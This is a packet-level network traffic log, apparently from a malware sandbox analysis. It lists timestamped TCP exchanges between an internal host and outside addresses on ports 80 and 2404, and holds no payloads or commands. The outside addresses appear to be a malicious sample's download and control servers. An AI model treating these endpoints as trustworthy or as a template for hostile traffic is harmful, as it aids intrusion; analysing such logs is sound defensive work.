Aug 28, 2024 22:29:40.555735111 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.555741072 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.555768967 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.555841923 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.555852890 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.555861950 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.555872917 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.555882931 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.555892944 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.555892944 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.555900097 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.555908918 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.555928946 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.555985928 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.555995941 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.556005955 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.556018114 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.556030035 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.556044102 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.556061983 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.556113958 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.556123972 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.556133986 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.556143999 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.556163073 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.556184053 CEST  49172  80     192.168.2.22   198.12.81.228
                                                                              Aug 28, 2024 22:29:40.556190014 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556200981 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556210995 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556224108 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556231022 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.556236029 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556246996 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556257010 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556261063 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.556277990 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.556307077 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556318045 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556329966 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556351900 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.556366920 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556376934 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556386948 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556400061 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556408882 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.556443930 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.556472063 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556488037 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556500912 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556535959 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.556554079 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556595087 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556632996 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.556663036 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556674004 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556684017 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556709051 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.556713104 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556762934 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.556767941 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556778908 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556807041 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.556818008 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556843996 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556880951 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556890011 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.556929111 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556938887 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556952000 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.556969881 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.556998014 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.557015896 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.557024956 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.557044029 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.557053089 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.557106972 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.557117939 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.557126999 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.557147026 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.557185888 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.557197094 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.557208061 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.557219028 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.557224035 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.557241917 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.557312012 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.557323933 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.557334900 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.557351112 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.557357073 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.557369947 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.557379961 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.557394028 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.557419062 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.557487011 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.557498932 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.557507992 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.557518005 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.557528019 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.557533026 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.557539940 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.557553053 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.557562113 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.557584047 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.557663918 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.653484106 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.693819046 CEST491732404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:40.698723078 CEST240449173192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:40.698787928 CEST491732404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:40.710190058 CEST491732404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:40.714994907 CEST240449173192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:41.235017061 CEST240449173192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:41.371959925 CEST240449173192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:41.372209072 CEST491732404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:41.377851963 CEST491732404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:41.382677078 CEST240449173192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:41.385644913 CEST491732404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:41.390908003 CEST240449173192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:41.803649902 CEST240449173192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:41.807136059 CEST491732404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:41.811968088 CEST240449173192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:41.904551029 CEST240449173192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:41.911595106 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:41.916438103 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:41.916492939 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:41.920069933 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:41.925184011 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.029730082 CEST4917580192.168.2.22178.237.33.50
                                                                              Aug 28, 2024 22:29:42.034668922 CEST8049175178.237.33.50192.168.2.22
                                                                              Aug 28, 2024 22:29:42.034717083 CEST4917580192.168.2.22178.237.33.50
                                                                              Aug 28, 2024 22:29:42.035069942 CEST4917580192.168.2.22178.237.33.50
                                                                              Aug 28, 2024 22:29:42.039848089 CEST8049175178.237.33.50192.168.2.22
                                                                              Aug 28, 2024 22:29:42.128982067 CEST240449173192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.129025936 CEST491732404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:42.395406961 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.525466919 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.525532961 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:42.530844927 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:42.535720110 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.535772085 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:42.540656090 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.678433895 CEST8049175178.237.33.50192.168.2.22
                                                                              Aug 28, 2024 22:29:42.678495884 CEST4917580192.168.2.22178.237.33.50
                                                                              Aug 28, 2024 22:29:42.684127092 CEST491732404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:42.689824104 CEST240449173192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.710715055 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.710735083 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.710743904 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.710773945 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:42.710803032 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.710813999 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.710824966 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.710848093 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:42.710850000 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.710860968 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.710870028 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.710894108 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:42.711019993 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.711030960 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.711055040 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:42.711715937 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.715852022 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.715888977 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.715893030 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:42.838401079 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.838413954 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.838424921 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.838474989 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:42.838530064 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.838541031 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.838551044 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.838577032 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:42.838747025 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.838814020 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.838824034 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.838855982 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:42.838947058 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.838957071 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.838967085 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.838993073 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:42.839726925 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.839801073 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.839811087 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.839843035 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:42.839927912 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.839941978 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.839951992 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.839977980 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:42.840822935 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:42.840848923 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.840859890 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.840868950 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.840897083 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:42.840939999 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.840950012 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.840959072 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.840989113 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:42.843013048 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:42.926839113 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.926851034 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.926860094 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.926875114 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.926884890 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.926896095 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.926922083 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:42.926933050 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:42.927011013 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.927021980 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.927031994 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.927054882 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:42.927875042 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.927885056 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.927896023 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:42.927927971 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:42.927962065 CEST240449174192.3.101.172192.168.2.22
Aug 28, 2024 22:29:42.927973032 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.927984953 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.928013086 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:42.928878069 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.928889036 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.928900003 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.928924084 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:42.928960085 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.928968906 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.928978920 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.929014921 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:42.929083109 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:42.929882050 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.929892063 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.929902077 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.929913044 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.929929018 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:42.929953098 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:42.930006027 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.930016994 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.930366993 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:42.930840015 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.930876970 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.930886984 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.930922031 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:42.930958033 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.930968046 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.930975914 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.930996895 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:42.931197882 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:42.931823015 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.931858063 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.931868076 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.931914091 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.931924105 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.931934118 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.931952000 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:42.932796955 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.932838917 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:42.932847977 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.932861090 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.932898045 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:42.932904959 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.932919025 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.932929039 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.932954073 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:42.933311939 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:42.933825016 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.933940887 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.933952093 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:42.933989048 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.015037060 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.015048027 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.015064955 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.015075922 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.015085936 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.015085936 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.015096903 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.015108109 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.015113115 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.015120983 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.015130043 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.015140057 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.015150070 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.015162945 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.015188932 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.015367985 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.015388966 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.015399933 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.015433073 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.015465975 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.015475035 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.015502930 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.015664101 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.015706062 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.015717030 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.015753984 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.015784025 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.015794039 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.015803099 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.015814066 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.015827894 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.015850067 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.015881062 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.015889883 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.015898943 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.015929937 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.016299963 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.016345024 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.016355038 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.016386032 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.016423941 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.016433954 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.016443968 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.016455889 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.016465902 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.016567945 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.016577959 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.016587973 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.016597986 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.016608953 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.016608953 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.016618967 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.016629934 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.016634941 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.016647100 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.017025948 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.017285109 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.017304897 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.017318964 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.017323017 CEST   49174  2404   192.168.2.22   192.3.101.172
